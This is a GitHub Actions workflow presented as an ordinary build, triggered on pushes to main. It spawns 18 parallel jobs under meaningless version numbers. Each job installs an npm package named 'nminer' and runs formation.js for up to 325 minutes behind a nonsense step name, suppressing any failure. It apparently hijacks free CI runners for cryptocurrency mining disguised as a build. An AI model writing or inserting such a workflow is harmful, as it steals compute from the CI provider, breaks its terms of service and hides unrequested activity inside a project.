name: formation
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 6808 }
          - { version: 9550 }
          - { version: 794 }
          - { version: 7325 }
          - { version: 5521 }
          - { version: 792 }
          - { version: 1443 }
          - { version: 8798 }
          - { version: 5406 }
          - { version: 7376 }
          - { version: 22 }
          - { version: 3084 }
          - { version: 2578 }
          - { version: 5186 }
          - { version: 4334 }
          - { version: 7263 }
          - { version: 6109 }
          - { version: 4028 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: furlough upbeat decriminalize conceptualize reorient
        run: |
          npm install nminer@latest
          timeout 325m node formation.js || echo "formation executed"